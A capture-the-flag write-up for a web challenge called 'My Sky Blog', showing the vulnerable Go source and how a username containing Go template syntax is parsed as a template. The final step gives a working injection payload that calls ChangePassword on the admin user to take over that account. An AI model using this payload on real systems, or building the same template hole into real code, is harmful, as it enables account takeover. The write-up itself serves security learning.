4T$ CTF | My Sky Blog (Web, Golang Template Injection)

Difficulty: Easy

Golang templates include little to no features to allow for file read or RCE but be careful when passing certain variables as they can be accessed and cause damage in some ways.

Our objective in this challenge is to read the flag, one way is to gain access to an admin account and read it from /flag path.

Let's start with reading the code, we have 3 releveant files :

index.go :

package main

import (
	"bytes"
	"fmt"
	"html/template"
	"math/rand"

	"github.com/labstack/echo/v4"
)

var randomSentences = []string{
	"Hey, %s; there are %d posts right now !",
	"What's up %s ? We're at %d ! Aiming for the stars !",
	"Want a coffee %s ? Ofc there's %d posts in here !",
	"Hello there, General %s, have you seen ? There's %d posts !",
}

func index(c echo.Context) error {
	s := c.Get("session").(*Session)
	templatePath := "templates/index.html"

	indexTemplate := template.Must(template.ParseFiles(templatePath))

	if s.User == nil {
		return c.Redirect(302, "/login")
	}

	// We do a cool sentence for our users :D
	chosenSentence := fmt.Sprintf(randomSentences[rand.Intn(len(randomSentences))], s.User.Username, s.NbPosts)
	coolSentence := template.Must(indexTemplate.New("cool").Parse(chosenSentence))

	// Execute our cool template 😎
	var buf bytes.Buffer
	if err := coolSentence.Execute(&buf, s); err != nil {
		fmt.Println("Error executing template:", err)
		return indexTemplate.Execute(c.Response().Writer, s)
	}

	s.CoolSentence = buf.String()

	return indexTemplate.Execute(c.Response().Writer, s)
}

sessions.go :

package main

import (
	"time"

	"github.com/google/uuid"
)

type Session struct {
	// Private fields
	users []*User
	id    string

	// Public fields
	User    *User
	Posts   []*Post
	NbPosts int

	HasError bool
	Error    string

	CoolSentence string
}

var sessions = make(map[string]*Session)

func CreateEmptySession() *Session {
	admin := &User{
		isAdmin:  true,
		Username: "admin",
	}

	// Get a random password
	randomPassword := uuid.New().String()

	admin.ChangePassword(randomPassword)

	id := uuid.New().String()

	return &Session{
		users: []*User{
			admin,
		},
		id: id,

		User: nil,
		Posts: []*Post{
			{
				Author:    admin,
				Title:     "Welcome to my beautiful Sky Blog!",
				Body:      "I welcome you to my blog, where I'll post about my adventures in the sky !",
				UpdatedAt: time.Date(2024, 5, 1, 12, 54, 30, 20, time.UTC),
			},
		},
		NbPosts: 1,
	}
}

and users.go :

package main

import (
	"crypto/sha256"
	"encoding/hex"

	"github.com/sirupsen/logrus"
)

type User struct {
	isAdmin  bool
	Username string
	Password string
}

func (u *User) ChangeUsername(username string) bool {
	u.Username = username

	return true
}

func (u *User) ChangePassword(password string) bool {
	logrus.Infof("Changing password for user %s", u.Username)

	h := sha256.New()
	h.Write([]byte(password))

	u.Password = hex.EncodeToString(h.Sum(nil))

	return true
}

func (u *User) CheckPassword(password string) bool {
	h := sha256.New()
	h.Write([]byte(password))

	return u.Password == hex.EncodeToString(h.Sum(nil))
}

we can see in the index.go that there is a way for SSTI, we can make q username that would inject code into the template through the random messages, we can test that with {{.}}.

we get a bunch of addresses and values, now we see what variables are passed to the template.

return indexTemplate.Execute(c.Response().Writer, s)

the return function in index.go passes the whole session object, we know that we have all the posts stored in the session and since the first post is the one from admin we can change the password of the admin from it and gain access to the app as admin.

we can delete the cookie and create a new user with this username :

{{range .Posts}} {{.Author.ChangePassword `test` }}{{end}}

now the admin password is test, we can login as that account, access the home page and then get the flag.